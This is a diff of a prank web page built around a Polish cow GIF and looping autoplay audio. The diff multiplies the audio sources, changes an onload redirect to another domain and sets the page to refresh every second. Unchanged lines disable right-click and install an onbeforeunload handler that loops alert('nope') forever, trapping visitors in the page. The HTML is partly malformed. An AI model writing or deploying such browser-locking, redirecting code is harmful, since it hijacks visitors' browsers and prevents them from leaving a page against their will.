--- a/index.html
+++ b/index.html
@@ -6,8 +6,15 @@
     		<img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fmedia.tenor.com%2Fimages%2Fde5baa5883f340e36d84e5251175f677%2Ftenor.gif&f=1&nofb=1" alt="Polish cow" />
 		</center>
 		<audio loop="loop" autoplay="true">
-            <source src="polishcow.mp3" type="audio/mp3">
-        </audio>
+            		<source src="polishcow.mp3" type="audio/mp3">
+			<source src="polishcow.mp3" type="audio/mp3">
+			<source src="polishcow.mp3" type="audio/mp3">
+			<source src="polishcow.mp3" type="audio/mp3">
+			<source src="polishcow.mp3" type="audio/mp3">
+			<source src="polishcow.mp3" type="audio/mp3">
+			<source src="polishcow.mp3" type="audio/mp3">
+			<source src="polishcow.mp3" type="audio/mp3">
+       		</audio>
 		
 		<script>
 		window.open("https://alexfunes.tk/polishcow.mp3", "topFrame");
@@ -65,11 +72,11 @@
 		}
 		</style>
 	<script>
-	<body oncontextmenu="return false" onload="location.href='https://www.darknessplugins.com/404', load();">
+	<body oncontextmenu="return false" onload="location.href='https://www.darknesscommunity.club/', load();">
 		<video autoplay="" loop=""> 
-			<source src="ynf-qhqnf-fba-ynf-rkcrpgngvinf-qr-yn-ernyvqnq.mp4" type='video/mp4'>
+			<source src="polishcow.mp4" type='video/mp4'>
 		</video>
-		<meta http-equiv=”refresh” content="5" />
+		<meta http-equiv=”refresh” content="1" />
 		<script>window.onbeforeunload = function(){
   		while (true) { alert("nope"); };
 	};
